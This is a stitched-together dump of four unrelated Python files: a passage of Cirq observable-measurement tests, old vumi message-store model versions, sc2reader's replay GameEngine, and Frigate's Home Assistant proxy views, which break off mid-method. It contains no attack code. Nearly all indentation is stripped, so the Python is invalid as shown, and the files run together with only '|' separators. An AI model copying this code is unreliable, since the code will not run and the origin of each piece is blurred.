stop = cw.RepetitionsStoppingCriteria(10_000)
with pytest.raises(ValueError, match='too many parameter settings'):
_, _ = _check_meas_specs_still_todo(
meas_specs=lots_of_meas_spec,
accumulators={meas_spec: bsa},
stopping_criteria=stop,
)
def test_meas_spec_still_todo_lots_of_params(monkeypatch):
monkeypatch.setattr(cw.observable_measurement, 'MAX_REPETITIONS_PER_JOB', 30_000)
bsa, meas_spec = _set_up_meas_specs_for_testing()
lots_of_meas_spec = [meas_spec] * 4
stop = cw.RepetitionsStoppingCriteria(10_000)
with pytest.warns(UserWarning, match='will be throttled from 10000 to 7500'):
_, _ = _check_meas_specs_still_todo(
meas_specs=lots_of_meas_spec,
accumulators={meas_spec: bsa},
stopping_criteria=stop,
)
def test_checkpoint_options():
    # There are three roughly binary options (the latter two can each be either
    # specified or `None`); we test those 2^3 cases.
assert _parse_checkpoint_options(False, None, None) == (None, None)
with pytest.raises(ValueError):
_parse_checkpoint_options(False, 'test', None)
with pytest.raises(ValueError):
_parse_checkpoint_options(False, None, 'test')
with pytest.raises(ValueError):
_parse_checkpoint_options(False, 'test1', 'test2')
chk, chkprev = _parse_checkpoint_options(True, None, None)
assert chk.startswith(tempfile.gettempdir())
assert chk.endswith('observables.json')
assert chkprev.startswith(tempfile.gettempdir())
assert chkprev.endswith('observables.prev.json')
chk, chkprev = _parse_checkpoint_options(True, None, 'prev.json')
assert chk.startswith(tempfile.gettempdir())
assert chk.endswith('observables.json')
assert chkprev == 'prev.json'
chk, chkprev = _parse_checkpoint_options(True, 'my_fancy_observables.json', None)
assert chk == 'my_fancy_observables.json'
assert chkprev == 'my_fancy_observables.prev.json'
chk, chkprev = _parse_checkpoint_options(True, 'my_fancy/observables.json', None)
assert chk == 'my_fancy/observables.json'
assert chkprev == 'my_fancy/observables.prev.json'
with pytest.raises(ValueError, match=r'Please use a `.json` filename.*'):
_parse_checkpoint_options(True, 'my_fancy_observables.obs', None)
with pytest.raises(ValueError, match=r"pattern of 'filename.extension'.*"):
_parse_checkpoint_options(True, 'my_fancy_observables', None)
with pytest.raises(ValueError, match=r"pattern of 'filename.extension'.*"):
_parse_checkpoint_options(True, '.obs', None)
with pytest.raises(ValueError, match=r"pattern of 'filename.extension'.*"):
_parse_checkpoint_options(True, 'obs.', None)
with pytest.raises(ValueError, match=r"pattern of 'filename.extension'.*"):
_parse_checkpoint_options(True, '', None)
chk, chkprev = _parse_checkpoint_options(True, 'test1', 'test2')
assert chk == 'test1'
assert chkprev == 'test2'
@pytest.mark.parametrize(('with_circuit_sweep', 'checkpoint'), [(True, True), (False, False)])
def test_measure_grouped_settings(with_circuit_sweep, checkpoint, tmpdir):
qubits = cirq.LineQubit.range(1)
(q,) = qubits
tests = [
(cirq.KET_ZERO, cirq.Z, 1),
(cirq.KET_ONE, cirq.Z, -1),
(cirq.KET_PLUS, cirq.X, 1),
(cirq.KET_MINUS, cirq.X, -1),
(cirq.KET_IMAG, cirq.Y, 1),
(cirq.KET_MINUS_IMAG, cirq.Y, -1),
]
if with_circuit_sweep:
ss = cirq.Linspace('a', 0, 1, 12)
else:
ss = None
if checkpoint:
checkpoint_fn = f'{tmpdir}/obs.json'
else:
checkpoint_fn = None
for init, obs, coef in tests:
setting = cw.InitObsSetting(
init_state=init(q),
observable=obs(q),
)
grouped_settings = {setting: [setting]}
circuit = cirq.Circuit(cirq.I.on_each(*qubits))
results = cw.measure_grouped_settings(
circuit=circuit,
grouped_settings=grouped_settings,
sampler=cirq.Simulator(),
stopping_criteria=cw.RepetitionsStoppingCriteria(1_000, repetitions_per_chunk=500),
circuit_sweep=ss,
checkpoint=CheckpointFileOptions(checkpoint=checkpoint, checkpoint_fn=checkpoint_fn),
)
if with_circuit_sweep:
for result in results:
assert result.means() == [coef]
else:
(result,) = results # one group
assert result.means() == [coef]
def _get_some_grouped_settings():
qubits = cirq.LineQubit.range(2)
q0, q1 = qubits
terms = [
cirq.X(q0),
cirq.Y(q1),
]
settings = list(cirq.work.observables_to_settings(terms, qubits))
grouped_settings = cirq.work.group_settings_greedy(settings)
return grouped_settings, qubits
def test_measure_grouped_settings_calibration_validation():
dummy_ro_calib = _MockBitstringAccumulator()
grouped_settings, qubits = _get_some_grouped_settings()
with pytest.raises(
ValueError, match=r'Readout calibration only works if `readout_symmetrization` is enabled'
):
cw.measure_grouped_settings(
circuit=cirq.Circuit(cirq.I.on_each(*qubits)),
grouped_settings=grouped_settings,
sampler=cirq.Simulator(),
stopping_criteria=cw.RepetitionsStoppingCriteria(10_000),
readout_calibrations=dummy_ro_calib,
readout_symmetrization=False, # no-no!
)
def test_measure_grouped_settings_read_checkpoint(tmpdir):
qubits = cirq.LineQubit.range(1)
(q,) = qubits
setting = cw.InitObsSetting(
init_state=cirq.KET_ZERO(q),
observable=cirq.Z(q),
)
grouped_settings = {setting: [setting]}
circuit = cirq.Circuit(cirq.I.on_each(*qubits))
with pytest.raises(ValueError, match=r'same filename.*'):
_ = cw.measure_grouped_settings(
circuit=circuit,
grouped_settings=grouped_settings,
sampler=cirq.Simulator(),
stopping_criteria=cw.RepetitionsStoppingCriteria(1_000, repetitions_per_chunk=500),
checkpoint=CheckpointFileOptions(
checkpoint=True,
checkpoint_fn=f'{tmpdir}/obs.json',
checkpoint_other_fn=f'{tmpdir}/obs.json', # Same filename
),
)
_ = cw.measure_grouped_settings(
circuit=circuit,
grouped_settings=grouped_settings,
sampler=cirq.Simulator(),
stopping_criteria=cw.RepetitionsStoppingCriteria(1_000, repetitions_per_chunk=500),
checkpoint=CheckpointFileOptions(
checkpoint=True,
checkpoint_fn=f'{tmpdir}/obs.json',
checkpoint_other_fn=f'{tmpdir}/obs.prev.json',
),
)
results = cirq.read_json(f'{tmpdir}/obs.json')
(result,) = results # one group
assert result.n_repetitions == 1_000
assert result.means() == [1.0]
Q = cirq.NamedQubit('q')
@pytest.mark.parametrize(
['circuit', 'observable'],
[
(cirq.Circuit(cirq.X(Q) ** 0.2), cirq.Z(Q)),
(cirq.Circuit(cirq.X(Q) ** -0.5, cirq.Z(Q) ** 0.2), cirq.Y(Q)),
(cirq.Circuit(cirq.Y(Q) ** 0.5, cirq.Z(Q) ** 0.2), cirq.X(Q)),
],
)
def test_XYZ_point8(circuit, observable):
# each circuit, observable combination should result in the observable value of 0.8
df = measure_observables_df(
circuit,
[observable],
cirq.Simulator(seed=52),
stopping_criteria=VarianceStoppingCriteria(1e-3 ** 2),
)
assert len(df) == 1, 'one observable'
mean = df.loc[0]['mean']
np.testing.assert_allclose(0.8, mean, atol=1e-2)
def _each_in_its_own_group_grouper(
settings: Iterable[InitObsSetting],
) -> Dict[InitObsSetting, List[InitObsSetting]]:
return {setting: [setting] for setting in settings}
@pytest.mark.parametrize(
'grouper', ['greedy', group_settings_greedy, _each_in_its_own_group_grouper]
)
def test_measure_observable_grouper(grouper):
circuit = cirq.Circuit(cirq.X(Q) ** 0.2)
observables = [
cirq.Z(Q),
cirq.Z(cirq.NamedQubit('q2')),
]
results = measure_observables(
circuit,
observables,
cirq.Simulator(seed=52),
stopping_criteria=RepetitionsStoppingCriteria(50_000),
grouper=grouper,
)
assert len(results) == 2, 'two observables'
np.testing.assert_allclose(0.8, results[0].mean, atol=0.05)
np.testing.assert_allclose(1, results[1].mean, atol=1e-9)
def test_measure_observable_bad_grouper():
circuit = cirq.Circuit(cirq.X(Q) ** 0.2)
observables = [
cirq.Z(Q),
cirq.Z(cirq.NamedQubit('q2')),
]
with pytest.raises(ValueError, match=r'Unknown grouping function'):
_ = measure_observables(
circuit,
observables,
cirq.Simulator(seed=52),
stopping_criteria=RepetitionsStoppingCriteria(50_000),
grouper='super fancy grouper',
)
|
|
"""Previous versions of message store models."""
from calendar import timegm
from datetime import datetime
from vumi.message import (
TransportUserMessage, TransportEvent, format_vumi_date, parse_vumi_date)
from vumi.persist.model import Model
from vumi.persist.fields import (
VumiMessage, ForeignKey, ListOf, Dynamic, Tag, Unicode, ManyToMany)
from vumi_message_store.migrators import (
InboundMessageMigrator, OutboundMessageMigrator, EventMigrator)
class BatchVNone(Model):
bucket = 'batch'
# key is batch_id
tags = ListOf(Tag())
metadata = Dynamic(Unicode())
class OutboundMessageVNone(Model):
bucket = 'outboundmessage'
# key is message_id
msg = VumiMessage(TransportUserMessage)
batch = ForeignKey(BatchVNone, null=True)
class EventVNone(Model):
bucket = 'event'
# key is event_id
event = VumiMessage(TransportEvent)
message = ForeignKey(OutboundMessageVNone)
class InboundMessageVNone(Model):
bucket = 'inboundmessage'
# key is message_id
msg = VumiMessage(TransportUserMessage)
batch = ForeignKey(BatchVNone, null=True)
class OutboundMessageV1(Model):
bucket = 'outboundmessage'
VERSION = 1
MIGRATOR = OutboundMessageMigrator
# key is message_id
msg = VumiMessage(TransportUserMessage)
batches = ManyToMany(BatchVNone)
class InboundMessageV1(Model):
bucket = 'inboundmessage'
VERSION = 1
MIGRATOR = InboundMessageMigrator
# key is message_id
msg = VumiMessage(TransportUserMessage)
batches = ManyToMany(BatchVNone)
class OutboundMessageV2(Model):
bucket = 'outboundmessage'
VERSION = 2
MIGRATOR = OutboundMessageMigrator
# key is message_id
msg = VumiMessage(TransportUserMessage)
batches = ManyToMany(BatchVNone)
# Extra fields for compound indexes
batches_with_timestamps = ListOf(Unicode(), index=True)
def save(self):
# We override this method to set our index fields before saving.
batches_with_timestamps = []
timestamp = self.msg['timestamp']
for batch_id in self.batches.keys():
batches_with_timestamps.append(u"%s$%s" % (batch_id, timestamp))
self.batches_with_timestamps = batches_with_timestamps
return super(OutboundMessageV2, self).save()
class InboundMessageV2(Model):
bucket = 'inboundmessage'
VERSION = 2
MIGRATOR = InboundMessageMigrator
# key is message_id
msg = VumiMessage(TransportUserMessage)
batches = ManyToMany(BatchVNone)
# Extra fields for compound indexes
batches_with_timestamps = ListOf(Unicode(), index=True)
def save(self):
# We override this method to set our index fields before saving.
batches_with_timestamps = []
timestamp = self.msg['timestamp']
for batch_id in self.batches.keys():
batches_with_timestamps.append(u"%s$%s" % (batch_id, timestamp))
self.batches_with_timestamps = batches_with_timestamps
return super(InboundMessageV2, self).save()
class OutboundMessageV3(Model):
bucket = 'outboundmessage'
VERSION = 3
MIGRATOR = OutboundMessageMigrator
# key is message_id
msg = VumiMessage(TransportUserMessage)
batches = ManyToMany(BatchVNone)
# Extra fields for compound indexes
batches_with_timestamps = ListOf(Unicode(), index=True)
batches_with_addresses = ListOf(Unicode(), index=True)
def save(self):
# We override this method to set our index fields before saving.
batches_with_timestamps = []
batches_with_addresses = []
timestamp = format_vumi_date(self.msg['timestamp'])
for batch_id in self.batches.keys():
batches_with_timestamps.append(u"%s$%s" % (batch_id, timestamp))
batches_with_addresses.append(
u"%s$%s$%s" % (batch_id, timestamp, self.msg['to_addr']))
self.batches_with_timestamps = batches_with_timestamps
self.batches_with_addresses = batches_with_addresses
return super(OutboundMessageV3, self).save()
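# The compound-index values built in save() above are plain strings of the form
# "<batch_id>$<timestamp>" and "<batch_id>$<timestamp>$<to_addr>", for example
# (hypothetical values) "batch-1$2015-01-01 00:00:00.000000$+27831234567", so a
# range query over the indexed field orders messages by timestamp within a batch.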
class InboundMessageV3(Model):
bucket = 'inboundmessage'
VERSION = 3
MIGRATOR = InboundMessageMigrator
# key is message_id
msg = VumiMessage(TransportUserMessage)
batches = ManyToMany(BatchVNone)
# Extra fields for compound indexes
batches_with_timestamps = ListOf(Unicode(), index=True)
batches_with_addresses = ListOf(Unicode(), index=True)
def save(self):
# We override this method to set our index fields before saving.
batches_with_timestamps = []
batches_with_addresses = []
timestamp = self.msg['timestamp']
for batch_id in self.batches.keys():
batches_with_timestamps.append(u"%s$%s" % (batch_id, timestamp))
batches_with_addresses.append(
u"%s$%s$%s" % (batch_id, timestamp, self.msg['from_addr']))
self.batches_with_timestamps = batches_with_timestamps
self.batches_with_addresses = batches_with_addresses
return super(InboundMessageV3, self).save()
class EventV1(Model):
bucket = 'event'
VERSION = 1
MIGRATOR = EventMigrator
# key is event_id
event = VumiMessage(TransportEvent)
message = ForeignKey(OutboundMessageV3)
# Extra fields for compound indexes
message_with_status = Unicode(index=True, null=True)
def save(self):
# We override this method to set our index fields before saving.
timestamp = self.event['timestamp']
status = self.event['event_type']
if status == "delivery_report":
status = "%s.%s" % (status, self.event['delivery_status'])
self.message_with_status = u"%s$%s$%s" % (
self.message.key, timestamp, status)
return super(EventV1, self).save()
def to_reverse_timestamp(vumi_timestamp):
"""
Turn a vumi_date-formatted string into a string that sorts in reverse order
and can be turned back into a timestamp later.
This is done by converting to a unix timestamp and subtracting it from
0xffffffffff (2**40 - 1) to get a number well outside the range
representable by the datetime module. The result is returned as a
hexadecimal string.
"""
timestamp = timegm(parse_vumi_date(vumi_timestamp).timetuple())
return "%X" % (0xffffffffff - timestamp)
def from_reverse_timestamp(reverse_timestamp):
"""
Turn a reverse timestamp string (from `to_reverse_timestamp()`) into a
vumi_date-formatted string.
"""
timestamp = 0xffffffffff - int(reverse_timestamp, 16)
return format_vumi_date(datetime.utcfromtimestamp(timestamp))
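# A minimal usage sketch, assuming the usual vumi date string format
# "%Y-%m-%d %H:%M:%S.%f" accepted by parse_vumi_date:
#
#     early = to_reverse_timestamp("2015-01-01 00:00:00.000000")
#     late = to_reverse_timestamp("2016-01-01 00:00:00.000000")
#     late < early                                     # newer dates sort first
#     from_reverse_timestamp(early) == "2015-01-01 00:00:00.000000"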
class OutboundMessageV4(Model):
bucket = 'outboundmessage'
VERSION = 4
MIGRATOR = OutboundMessageMigrator
# key is message_id
msg = VumiMessage(TransportUserMessage)
batches = ManyToMany(BatchVNone)
# Extra fields for compound indexes
batches_with_timestamps = ListOf(Unicode(), index=True)
batches_with_addresses = ListOf(Unicode(), index=True)
batches_with_addresses_reverse = ListOf(Unicode(), index=True)
def save(self):
# We override this method to set our index fields before saving.
self.batches_with_timestamps = []
self.batches_with_addresses = []
self.batches_with_addresses_reverse = []
timestamp = self.msg['timestamp']
if not isinstance(timestamp, basestring):
timestamp = format_vumi_date(timestamp)
reverse_ts = to_reverse_timestamp(timestamp)
for batch_id in self.batches.keys():
self.batches_with_timestamps.append(
u"%s$%s" % (batch_id, timestamp))
self.batches_with_addresses.append(
u"%s$%s$%s" % (batch_id, timestamp, self.msg['to_addr']))
self.batches_with_addresses_reverse.append(
u"%s$%s$%s" % (batch_id, reverse_ts, self.msg['to_addr']))
return super(OutboundMessageV4, self).save()
class InboundMessageV4(Model):
bucket = 'inboundmessage'
VERSION = 4
MIGRATOR = InboundMessageMigrator
# key is message_id
msg = VumiMessage(TransportUserMessage)
batches = ManyToMany(BatchVNone)
# Extra fields for compound indexes
batches_with_timestamps = ListOf(Unicode(), index=True)
batches_with_addresses = ListOf(Unicode(), index=True)
batches_with_addresses_reverse = ListOf(Unicode(), index=True)
def save(self):
# We override this method to set our index fields before saving.
self.batches_with_timestamps = []
self.batches_with_addresses = []
self.batches_with_addresses_reverse = []
timestamp = self.msg['timestamp']
if not isinstance(timestamp, basestring):
timestamp = format_vumi_date(timestamp)
reverse_ts = to_reverse_timestamp(timestamp)
for batch_id in self.batches.keys():
self.batches_with_timestamps.append(
u"%s$%s" % (batch_id, timestamp))
self.batches_with_addresses.append(
u"%s$%s$%s" % (batch_id, timestamp, self.msg['from_addr']))
self.batches_with_addresses_reverse.append(
u"%s$%s$%s" % (batch_id, reverse_ts, self.msg['from_addr']))
return super(InboundMessageV4, self).save()
|
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals, division
import collections
from sc2reader.events import *
from sc2reader.engine.events import InitGameEvent, EndGameEvent, PluginExit
class GameEngine(object):
"""
GameEngine Specification
--------------------------
The game engine runs through all the events for a given replay in
chronological order. For each event, event handlers from registered
plugins are executed in order of plugin registration from most general
to most specific.
Example Usage::
class Plugin1():
def handleCommandEvent(self, event, replay):
pass
class Plugin2():
def handleEvent(self, event, replay):
pass
def handleTargetUnitCommandEvent(self, event, replay):
pass
...
engine = GameEngine(plugins=[Plugin1(), Plugin2()], **options)
            engine.register_plugins(Plugin3(), Plugin4())
            engine.register_plugin(Plugin5())
engine.run(replay)
Calls functions in the following order for a ``TargetUnitCommandEvent``::
Plugin1.handleCommandEvent(event, replay)
Plugin2.handleEvent(event, replay)
Plugin2.handleTargetUnitCommandEvent(event, replay)
Plugin Specification
-------------------------
Plugins can opt in to handle events with methods in the format:
def handleEventName(self, event, replay)
In addition to handling specific event types, plugins can also
handle events more generally by handling built-in parent classes
from the list below::
* handleEvent - called for every single event of all types
* handleMessageEvent - called for events in replay.message.events
* handleGameEvent - called for events in replay.game.events
* handleTrackerEvent - called for events in replay.tracker.events
* handleCommandEvent - called for all types of command events
* handleControlGroupEvent - called for all player control group events
Plugins may also handle optional ``InitGame`` and ``EndGame`` events generated
by the GameEngine before and after processing all the events:
* handleInitGame - is called prior to processing a new replay to provide
an opportunity for the plugin to clear internal state and set up any
replay state necessary.
* handleEndGame - is called after all events have been processed and
can be used to perform post processing on aggregated data or clean up
intermediate data caches.
Event handlers can choose to ``yield`` additional events which will be injected
into the event stream directly after the event currently being processed. This
feature allows for message passing between plugins. An ExpansionTracker plugin
could notify all other plugins of a new ExpansionEvent that they could opt to
process::
def handleUnitDoneEvent(self, event, replay):
if event.unit.name == 'Nexus':
yield ExpansionEvent(event.frame, event.unit)
....
If a plugin wishes to stop processing a replay it can yield a PluginExit event before returning::
def handleEvent(self, event, replay):
if len(replay.tracker_events) == 0:
yield PluginExit(self, code=0, details=dict(msg="tracker events required"))
return
...
def handleCommandEvent(self, event, replay):
try:
possibly_throwing_error()
                except Exception as e:
logger.error(e)
yield PluginExit(self, code=0, details=dict(msg="Unexpected exception"))
The GameEngine will intercept this event and remove the plugin from the list of
active plugins for this replay. The exit code and details will be available from the
replay::
code, details = replay.plugins['MyPlugin']
If your plugin depends on another plugin, it is a good idea to implement handlePluginExit
and be alerted if the plugin that you require fails. This way you can exit gracefully. You
can also check to see if the plugin name is in ``replay.plugin_failures``::
if 'RequiredPlugin' in replay.plugin_failures:
code, details = replay.plugins['RequiredPlugin']
message = "RequiredPlugin failed with code: {0}. Cannot continue.".format(code)
yield PluginExit(self, code=1, details=dict(msg=message))
"""
def __init__(self, plugins=[]):
self._plugins = list()
self.register_plugins(*plugins)
def register_plugin(self, plugin):
self._plugins.append(plugin)
def register_plugins(self, *plugins):
for plugin in plugins:
self.register_plugin(plugin)
def plugins(self):
return self._plugins
def run(self, replay):
# A map of [event.name] => event handlers in plugin registration order
# ranked from most generic to most specific
handlers = dict()
# Create a local copy of the plugins list. As plugins exit we can
# remove them from this list and regenerate event handlers.
plugins = list(self._plugins)
# Create a dict for storing plugin exit codes and details.
replay.plugin_result = replay.plugins = dict()
# Create a list storing replay.plugins keys for failures.
replay.plugin_failures = list()
        # Fill the event queue with the replay events, bookended by Init and End events.
event_queue = collections.deque()
event_queue.append(InitGameEvent())
event_queue.extend(replay.events)
event_queue.append(EndGameEvent())
# Work through the events in the queue, pushing newly emitted events to
# the front of the line for immediate processing.
while len(event_queue) > 0:
event = event_queue.popleft()
if event.name == "PluginExit":
# Remove the plugin and reset the handlers.
plugins.remove(event.plugin)
handlers.clear()
replay.plugin_result[event.plugin.name] = (event.code, event.details)
if event.code != 0:
replay.plugin_failures.append(event.plugin.name)
# If we haven't compiled a list of handlers for this event yet, do so!
if event.name not in handlers:
event_handlers = self._get_event_handlers(event, plugins)
handlers[event.name] = event_handlers
else:
event_handlers = handlers[event.name]
# Events have the option of yielding one or more additional events
# which get processed after the current event finishes. The new_events
# batch is constructed in reverse order because extendleft reverses
# the order again with a series of appendlefts.
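            # For example, deque([1]).extendleft([2, 3]) yields deque([3, 2, 1]),
            # so events yielded in the order [a, b] are appendleft-ed here as
            # [b, a] and come back out of extendleft in the original [a, b] order.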
new_events = collections.deque()
for event_handler in event_handlers:
try:
for new_event in event_handler(event, replay) or []:
if new_event.name == "PluginExit":
new_events.append(new_event)
break
else:
new_events.appendleft(new_event)
except Exception as e:
if event_handler.__self__.name in ["ContextLoader"]:
# Certain built in plugins should probably still cause total failure
raise # Maybe??
else:
new_event = PluginExit(
event_handler.__self__, code=1, details=dict(error=e)
)
new_events.append(new_event)
event_queue.extendleft(new_events)
# For any plugins that didn't yield a PluginExit event or throw unexpected exceptions,
# record a successful completion.
for plugin in plugins:
replay.plugin_result[plugin.name] = (0, dict())
def _get_event_handlers(self, event, plugins):
return sum(
[self._get_plugin_event_handlers(plugin, event) for plugin in plugins], []
)
def _get_plugin_event_handlers(self, plugin, event):
handlers = list()
if isinstance(event, Event) and hasattr(plugin, "handleEvent"):
handlers.append(getattr(plugin, "handleEvent", None))
if isinstance(event, MessageEvent) and hasattr(plugin, "handleMessageEvent"):
handlers.append(getattr(plugin, "handleMessageEvent", None))
if isinstance(event, GameEvent) and hasattr(plugin, "handleGameEvent"):
handlers.append(getattr(plugin, "handleGameEvent", None))
if isinstance(event, TrackerEvent) and hasattr(plugin, "handleTrackerEvent"):
handlers.append(getattr(plugin, "handleTrackerEvent", None))
if isinstance(event, CommandEvent) and hasattr(plugin, "handleCommandEvent"):
handlers.append(getattr(plugin, "handleCommandEvent", None))
if isinstance(event, ControlGroupEvent) and hasattr(
plugin, "handleControlGroupEvent"
):
handlers.append(getattr(plugin, "handleControlGroupEvent", None))
if hasattr(plugin, "handle" + event.name):
handlers.append(getattr(plugin, "handle" + event.name, None))
return handlers
|
|
"""Frigate HTTP views."""
from __future__ import annotations
import asyncio
from http import HTTPStatus
from ipaddress import ip_address
import logging
from typing import Any, Optional, cast
import aiohttp
from aiohttp import hdrs, web
from aiohttp.web_exceptions import HTTPBadGateway, HTTPUnauthorized
import jwt
from multidict import CIMultiDict
from yarl import URL
from custom_components.frigate.const import (
ATTR_CLIENT_ID,
ATTR_CONFIG,
ATTR_MQTT,
CONF_NOTIFICATION_PROXY_ENABLE,
DOMAIN,
)
from homeassistant.components.http import HomeAssistantView
from homeassistant.components.http.auth import DATA_SIGN_SECRET, SIGN_QUERY_PARAM
from homeassistant.components.http.const import KEY_HASS
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_URL
from homeassistant.core import HomeAssistant
_LOGGER: logging.Logger = logging.getLogger(__name__)
def get_default_config_entry(hass: HomeAssistant) -> ConfigEntry | None:
"""Get the default Frigate config entry.
This is for backwards compatibility for when only a single instance was
supported. If there's more than one instance configured, then there is no
default and the user must specify explicitly which instance they want.
"""
frigate_entries = hass.config_entries.async_entries(DOMAIN)
if len(frigate_entries) == 1:
return frigate_entries[0]
return None
def get_frigate_instance_id(config: dict[str, Any]) -> str | None:
"""Get the Frigate instance id from a Frigate configuration."""
# Use the MQTT client_id as a way to separate the frigate instances, rather
# than just using the config_entry_id, in order to make URLs maximally
# relatable/findable by the user. The MQTT client_id value is configured by
# the user in their Frigate configuration and will be unique per Frigate
# instance (enforced in practice on the Frigate/MQTT side).
return cast(Optional[str], config.get(ATTR_MQTT, {}).get(ATTR_CLIENT_ID))
def get_config_entry_for_frigate_instance_id(
hass: HomeAssistant, frigate_instance_id: str
) -> ConfigEntry | None:
"""Get a ConfigEntry for a given frigate_instance_id."""
for config_entry in hass.config_entries.async_entries(DOMAIN):
config = hass.data[DOMAIN].get(config_entry.entry_id, {}).get(ATTR_CONFIG, {})
if config and get_frigate_instance_id(config) == frigate_instance_id:
return config_entry
return None
def get_frigate_instance_id_for_config_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
) -> ConfigEntry | None:
"""Get a frigate_instance_id for a ConfigEntry."""
config = hass.data[DOMAIN].get(config_entry.entry_id, {}).get(ATTR_CONFIG, {})
return get_frigate_instance_id(config) if config else None
# These proxies are inspired by:
# - https://github.com/home-assistant/supervisor/blob/main/supervisor/api/ingress.py
class ProxyView(HomeAssistantView): # type: ignore[misc]
"""HomeAssistant view."""
requires_auth = True
def __init__(self, websession: aiohttp.ClientSession):
"""Initialize the frigate clips proxy view."""
self._websession = websession
def _get_config_entry_for_request(
self, request: web.Request, frigate_instance_id: str | None
) -> ConfigEntry | None:
"""Get a ConfigEntry for a given request."""
hass = request.app[KEY_HASS]
if frigate_instance_id:
return get_config_entry_for_frigate_instance_id(hass, frigate_instance_id)
return get_default_config_entry(hass)
def _create_path(self, **kwargs: Any) -> str | None:
"""Create path."""
raise NotImplementedError # pragma: no cover
def _permit_request(self, request: web.Request, config_entry: ConfigEntry) -> bool:
"""Determine whether to permit a request."""
return True
async def get(
self,
request: web.Request,
**kwargs: Any,
) -> web.Response | web.StreamResponse | web.WebSocketResponse:
"""Route data to service."""
try:
return await self._handle_request(request, **kwargs)
except aiohttp.ClientError as err:
_LOGGER.debug("Reverse proxy error for %s: %s", request.rel_url, err)
raise HTTPBadGateway() from None
async def _handle_request(
self,
request: web.Request,
frigate_instance_id: str | None = None,
**kwargs: Any,
) -> web.Response | web.StreamResponse:
"""Handle route for request."""
config_entry = self._get_config_entry_for_request(request, frigate_instance_id)
if not config_entry:
return web.Response(status=HTTPStatus.BAD_REQUEST)
if not self._permit_request(request, config_entry):
return web.Response(status=HTTPStatus.FORBIDDEN)
full_path = self._create_path(**kwargs)
if not full_path:
return web.Response(status=HTTPStatus.NOT_FOUND)
url = str(URL(config_entry.data[CONF_URL]) / full_path)
data = await request.read()
source_header = _init_header(request)
async with self._websession.request(
request.method,
url,
headers=source_header,
params=request.query,
allow_redirects=False,
data=data,
) as result:
headers = _response_header(result)
# Stream response
response = web.StreamResponse(status=result.status, headers=headers)
response.content_type = result.content_type
try:
await response.prepare(request)
async for data in result.content.iter_chunked(4096):
await response.write(data)
except (aiohttp.ClientError, aiohttp.ClientPayloadError) as err:
_LOGGER.debug("Stream error for %s: %s", request.rel_url, err)
except ConnectionResetError:
# Connection is reset/closed by peer.
pass
return response
class SnapshotsProxyView(ProxyView):
"""A proxy for snapshots."""
url = "/api/frigate/{frigate_instance_id:.+}/snapshot/{eventid:.*}"
extra_urls = ["/api/frigate/snapshot/{eventid:.*}"]
name = "api:frigate:snapshots"
def _create_path(self, **kwargs: Any) -> str | None:
"""Create path."""
return f"api/events/{kwargs['eventid']}/snapshot.jpg"
class NotificationsProxyView(ProxyView):
"""A proxy for notifications."""
url = "/api/frigate/{frigate_instance_id:.+}/notifications/{event_id}/{path:.*}"
extra_urls = ["/api/frigate/notifications/{event_id}/{path:.*}"]
name = "api:frigate:notification"
requires_auth = False
def _create_path(self, **kwargs: Any) -> str | None:
"""Create path."""
path, event_id = kwargs["path"], kwargs["event_id"]
if path == "thumbnail.jpg":
return f"api/events/{event_id}/thumbnail.jpg"
if path == "snapshot.jpg":
return f"api/events/{event_id}/snapshot.jpg"
if path.endswith("clip.mp4"):
return f"api/events/{event_id}/clip.mp4"
return None
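    # For example (hypothetical IDs), a request for
    # /api/frigate/<instance-id>/notifications/1234.5-abcdef/thumbnail.jpg is
    # proxied to <frigate base URL>/api/events/1234.5-abcdef/thumbnail.jpg.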
def _permit_request(self, request: web.Request, config_entry: ConfigEntry) -> bool:
"""Determine whether to permit a request."""
return bool(config_entry.options.get(CONF_NOTIFICATION_PROXY_ENABLE, True))
class VodProxyView(ProxyView):
"""A proxy for vod playlists."""
url = "/api/frigate/{frigate_instance_id:.+}/vod/{path:.+}/{manifest:.+}.m3u8"
extra_urls = ["/api/frigate/vod/{path:.+}/{manifest:.+}.m3u8"]
    name = "api:frigate:vod:manifest"
def _create_path(self, **kwargs: Any) -> str | None:
"""Create path."""
return f"vod/{kwargs['path']}/{kwargs['manifest']}.m3u8"
class VodSegmentProxyView(ProxyView):
"""A proxy for vod segments."""
url = "/api/frigate/{frigate_instance_id:.+}/vod/{path:.+}/{segment:.+}.ts"
extra_urls = ["/api/frigate/vod/{path:.+}/{segment:.+}.ts"]
name = "api:frigate:vod:segment"
requires_auth = False
def _create_path(self, **kwargs: Any) -> str | None:
"""Create path."""
return f"vod/{kwargs['path']}/{kwargs['segment']}.ts"
async def _async_validate_signed_manifest(self, request: web.Request) -> bool:
"""Validate the signature for the manifest of this segment."""
hass = request.app[KEY_HASS]
secret = hass.data.get(DATA_SIGN_SECRET)
signature = request.query.get(SIGN_QUERY_PARAM)
if signature is None:
_LOGGER.warning("Missing authSig query parameter on VOD segment request.")
return False
try:
claims = jwt.decode(
signature, secret, algorithms=["HS256"], options={"verify_iss": False}
)
except jwt.InvalidTokenError:
_LOGGER.warning("Invalid JWT token for VOD segment request.")
return False
# Check that the base path is the same as what was signed
check_path = request.path.rsplit("/", maxsplit=1)[0]
if not claims["path"].startswith(check_path):
_LOGGER.warning("%s does not start with %s", claims["path"], check_path)
return False
return True
async def get(
self,
request: web.Request,
**kwargs: Any,
) -> web.Response | web.StreamResponse | web.WebSocketResponse:
"""Route data to service."""
if not await self._async_validate_signed_manifest(request):
raise HTTPUnauthorized()
return await super().get(request, **kwargs)
class WebsocketProxyView(ProxyView):
"""A simple proxy for websockets."""
async def _proxy_msgs(
self,
ws_in: aiohttp.ClientWebSocketResponse | web.WebSocketResponse,
ws_out: aiohttp.ClientWebSocketResponse | web.WebSocketResponse,
) -> None:
async for msg in ws_in:
try:
if msg.type == aiohttp.WSMsgType.TEXT:
await ws_out.send_str(msg.data)
elif msg.type == aiohttp.WSMsgType.BINARY:
await ws_out.send_bytes(msg.data)
elif msg.type == aiohttp.WSMsgType.PING:
await ws_out.ping()
elif msg.type == aiohttp.WSMsgType.PONG:
await ws_out.pong()
except ConnectionResetError:
return
async def _handle_request(
self,
request: web.Request,
frigate_instance_id: str | None = None,
**kwargs: Any,
) -> web.Response | web.StreamResponse:
"""Handle route for request."""
config_entry = self._get_config_entry_for_request(request, frigate_instance_id)
if not config_entry:
return web.Response(status=HTTPStatus.BAD_REQUEST)
if not self._permit_request(request, config_entry):
